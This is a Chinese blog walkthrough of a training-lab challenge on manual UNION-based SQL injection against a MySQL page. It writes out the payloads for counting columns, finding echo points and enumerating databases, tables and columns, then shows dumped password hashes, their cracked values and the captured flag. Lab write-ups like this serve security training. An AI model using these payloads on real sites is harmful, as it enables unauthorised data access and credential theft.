SQL手工注入漏洞測試 MySQL資料庫 字元型)

2021-10-14 23:45:48 字數 2693 閱讀 1981

第一步:判斷注入點:

在瀏覽器的url介面輸入乙個單引號,發現頁面報錯,接著輸入

/new_list.php?id=tingjigonggao'--'發現頁面正常,由此該url存在字元型注入漏洞

第二步:判斷字段數

利用order by 語句,值為4頁面正常。

後面的可以用單引號,也可以用+來表示

/new_list.php?id=tingjigonggao' order by 4 --'第三步:查詢回顯點

利用union聯合查詢來尋找回顯點,union前面的語句需要報錯才能顯示我們輸入的

/new_list.php?id=tingjigonggaoo' union select 1,2,3,4 --'此時頁面會出現數字2和數字3,說明2和3的位置可以供我們利用

第四步:利用回顯點爆破資料庫

利用回顯點獲取資料庫的名稱和版本

由頁面返回結果之資料庫為:mozhe_discuz_stormgroup,版本:10.2.15-mariadb-log

/new_list.php?id=tingjigonggaoo' union select 1,database(),version(),4 --'接下來繼續查詢資料庫的個數利用limit這個函式,

/new_list.php?id=tingjigonggaoo' union select 1

,schema_name,3,

4 from information_schema.schemata limit 0,1

--+發現0增加到5的時候報錯,說明有五個資料庫分別為mysql,information_schema,mozhe_discuz_stormgroup,performance_schema,test

第五步:根據爆出的資料庫爆破表名

查詢表的個數(這裡以mozhe_discuz_stormgroup為例,如果想查詢其他資料庫表的資訊

只需要把資料庫名稱改下即可),0增加到2的時候報錯,說明這個資料庫有兩個表分別是

notice,stormgroup_member

/new_list.php?id=tingjigonggaoo' union select 1,2,table_name,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup' limit 0,1

--+第六步:根據資料庫的表爆破欄位名

(這裡以mozhe_discuz_stormgroup資料庫和stormgroup_member表為例)

/new_list.php?id=tingjigonggaoo' union select 1,2,column_name,4 from information_schema.columns where table_schema='mozhe_discuz_stormgroup' and table_name='stormgroup_member' limit 0,1

--+發現0增加到4的時候頁面報錯,說明這個表有三個字段分別是 id,name,password,status

**第七步:根據爆出的字段直接破解出其字段內容*

+爆出了兩個賬號:

mozhe-356f589a7df439f6f744ff19bb8092c0

mozhe-6a558d023dddea9d4f4b27f2e2061a08

站長直接進行解密

mozhe-dsan13

mozhe-762247

登陸第二個賬號成功進入管理後台拿到key

mozhec268db8e10e12a5fd62b9c13846

SQL手工注入漏洞測試 MySQL資料庫

判斷注入點,id 1 and 1 1正常,id 1 and 1 2報錯,發現存在sql注入 id 1 and 1 2 order by n n 1,2,3,4 發現有4列 判斷回顯id 1 and 1 2 union select 1,2,3,4 id 1 and 1 2 union select ...

SQL手工注入漏洞測試 MySQL資料庫

墨者學院的題 記一下通關經過 本題純屬練習手工,無任何過濾。sql手工注入漏洞測試 mysql資料庫 還有 的一篇iamsoscared大神的sqlmap詳細教程。點選開啟靶場環境,訪問題目 ok一進來就是登入框 試了一下登入框並沒有發現注入,到處點點看 發現登入框下面的公告的鏈結是?id 1,手工...

基礎Web漏洞 SQL注入入門 手工注入篇

sql是運算元據庫資料的結構化查詢語言,網頁的應用資料和後台資料庫中的資料進行互動時會採用sql。而sql注入是將web頁面的原url 表單域或資料報輸入的引數,修改拼接成sql語句,傳遞給web伺服器,進而傳給資料庫伺服器以執行資料庫命令。如web應用程式的開發人員對使用者所輸入的資料或cooki...